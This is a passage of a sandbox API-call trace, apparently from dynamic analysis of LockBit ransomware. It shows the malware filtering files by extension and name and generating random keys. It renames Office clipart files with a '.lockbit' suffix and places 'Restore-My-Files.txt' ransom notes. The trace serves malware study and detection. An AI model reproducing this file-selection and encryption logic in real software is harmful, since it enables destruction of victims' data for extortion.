returned -1 [0175.656] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.656] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.657] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00656_.WMF") returned -1 [0175.657] lstrcmpiW (lpString1="ntldr", lpString2="SO00656_.WMF") returned -1 [0175.657] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00656_.WMF") returned -1 [0175.657] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00656_.WMF") returned -1 [0175.657] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00656_.WMF") returned -1 [0175.657] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00656_.WMF") returned 1 [0175.657] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00656_.WMF") returned -1 [0175.657] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.658] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF") returned=".WMF" [0175.658] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.658] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.658] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.659] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.659] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF.lockbit") returned 72 [0175.659] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00656_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.660] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.660] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.660] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1412) returned 1 [0175.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.661] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.667] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.667] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.668] free (_Block=0x1fa2ed8) [0175.668] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00656_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.668] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.668] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.669] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1652, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00668_.WMF", cAlternateFileName="")) returned 1 [0175.669] lstrcmpiW (lpString1=".", lpString2="SO00668_.WMF") returned -1 [0175.669] lstrcmpiW (lpString1="..", lpString2="SO00668_.WMF") returned -1 [0175.669] PathFindExtensionW (pszPath="SO00668_.WMF") returned=".WMF" [0175.669] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.669] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.670] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.670] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00668_.WMF") returned -1 [0175.671] lstrcmpiW (lpString1="ntldr", lpString2="SO00668_.WMF") returned -1 [0175.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00668_.WMF") returned -1 [0175.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00668_.WMF") returned -1 [0175.671] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00668_.WMF") returned -1 [0175.671] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00668_.WMF") returned 1 [0175.671] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00668_.WMF") returned -1 [0175.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF") returned=".WMF" [0175.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.671] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.671] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.672] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.672] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF.lockbit") returned 72 [0175.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00668_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.673] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.673] malloc (_Size=0x40068) returned 0x3df0008 [0175.673] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5714) returned 1 [0175.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.675] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.680] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.680] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.681] free (_Block=0x1fa2ed8) [0175.681] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00668_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.681] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.681] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.681] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00670_.WMF", cAlternateFileName="")) returned 1 [0175.681] lstrcmpiW (lpString1=".", lpString2="SO00670_.WMF") returned -1 [0175.681] lstrcmpiW (lpString1="..", lpString2="SO00670_.WMF") returned -1 [0175.682] PathFindExtensionW (pszPath="SO00670_.WMF") returned=".WMF" [0175.682] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.682] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.682] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00670_.WMF") returned -1 [0175.683] lstrcmpiW (lpString1="ntldr", lpString2="SO00670_.WMF") returned -1 [0175.683] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00670_.WMF") returned -1 [0175.683] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00670_.WMF") returned -1 [0175.683] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00670_.WMF") returned -1 [0175.683] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00670_.WMF") returned 1 [0175.683] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00670_.WMF") returned -1 [0175.683] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.683] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF") returned=".WMF" [0175.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.684] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.684] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.684] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF.lockbit") returned 72 [0175.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00670_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.685] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.685] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.686] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5824) returned 1 [0175.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.686] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.692] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 